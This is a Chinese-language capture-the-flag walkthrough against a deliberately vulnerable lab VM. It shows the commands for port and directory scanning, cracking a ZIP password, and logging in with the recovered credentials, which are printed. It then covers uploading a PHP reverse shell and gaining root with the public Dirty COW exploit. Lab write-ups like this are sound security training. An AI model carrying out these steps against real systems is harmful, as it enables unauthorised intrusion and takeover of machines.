赞
踩
今天没有废话…
kali:192.168.132.139
靶机IP:192.168…132.175
nmap -sS -A -sV -T4 -p- 192.168.132.175
-sS:半开扫描,很少有系统会把他记录在系统日志里面,不过需要root权限
-A:全面系统检测,启动脚本检测、扫描等
-sV:探测端口服务版本
-T4:针对TCP端口禁止动态扫描延迟超过10ms
-p-:全端口扫描
只开启了80端口,那我们一定要去web页面看一看
进入页面发现有一张显眼的图片(这个时候我怀疑是否存在隐写)
同时检查了一下源代码并没有扫描隐藏信息
将图片下载本地,但是没有图片隐藏
wget http://192.168.132.175/db.png
#用了俩个隐写刺探工具
binwalk db.png
exiftool db.png
这里不推荐使用dirb(扫描太慢了!!!)
我使用的是gobuster(事实上是我试了三个,还有)
dirb http://192.168.132.175 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -X .zip -w
gobuster dir -u http://192.168.132.175 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip
根据扫描目录发现/robots目录进去看看
暴露出来一个目录(虽然写着禁止但是我们肯定是要进去看看的)
去到目录下是一个后台登陆地址,需要账号密码
不要忘记我们扫描目录的时候还扫出来一个ZIP
下载下来看看,需要爆破密码
wget http://192.168.132.175/spammer.zip
unzip spammer.zip
zip2john spammer.zip > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
ZIP的密码爆破出来了,解压后是一个文本里面有后台账号密码
账号:mayer 密码:lionheart
搜索后台发现一处文件上传处,经过测试居然是任意文件上传
上传我们的反弹shell马(后来在admin下找到文件上传地址:/textpattern/files)
cp /usr/share/webshells/php/php-reverse-shell.php .
vim php-reverse-shell.php
在kali处接收反弹shell
查看内核版本(看到这个版本,那就快乐的Dirty-cow Linux内核提权吧)
红红火火恍恍惚惚哈哈哈哈哈
uname -a
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
内核版本>= 2.6.22 , 尝试脏牛提权
直接利用网上公开的exp进行尝试提权:https://github.com/FireFart/dirtycow
进行编译,生成一个dirty的可执行文件:gcc -pthread dirty.c -o dirty -lcrypt
执行./dirty 密码命令,即可进行提权。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。